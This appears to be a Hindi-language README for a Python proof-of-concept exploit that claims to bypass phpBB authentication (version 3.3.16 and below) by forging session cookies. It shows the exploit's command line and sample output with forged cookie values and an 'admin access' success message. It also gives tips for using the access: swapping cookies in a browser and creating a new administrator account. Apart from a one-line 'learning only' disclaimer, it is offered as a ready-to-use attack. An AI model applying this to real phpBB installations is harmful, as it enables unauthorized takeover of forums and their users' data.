
Python प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो phpBB 3.3.16 और उससे नीचे के संस्करणों में सत्र कुकीज़ को फ़ोर्ज करके प्रमाणीकरण को बायपास करता है और एडमिन एक्सेस प्राप्त करता है।
प्रमाणीकरण बायपास
सरल poc बायपास प्रमाणीकरण यदि आप ब्राउज़र के माध्यम से एक्सेस करना चाहते हैं तो स्क्रिप्ट में USER_AGENT वेरिएबल को अपने ब्राउज़र में प्रदर्शित होने वाले के अनुसार बदलना न भूलें ताकि यह काम कर सके। *_sid और *_u का मान बदलने के लिए कुकी एडिटर का उपयोग करें
phpbb python3 exploit.py https://localhost:8000 joushk
[+] Target: https://localhost:8000
[+] Target username: joushk
[+] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36
[+] Session cookies obtained:
phpbb3_cl7ge_u: 2
phpbb3_cl7ge_k:
phpbb3_cl7ge_sid: 4823a1ffeea59187eb31be1809ec0fd3
[+] User ID: 2
[!] User ID is 2 – default admin account.
[!] EXPLOIT SUCCESSFUL!
[!] You now have admin access.
[!] Note: ACP may still ask for password if re-authentication is enabled.
[+] tips: new create user and add to administrator group using bypass account auth and login to ACP Successd
[!!!यह स्क्रिप्ट केवल सीखने के उद्देश्य के लिए है]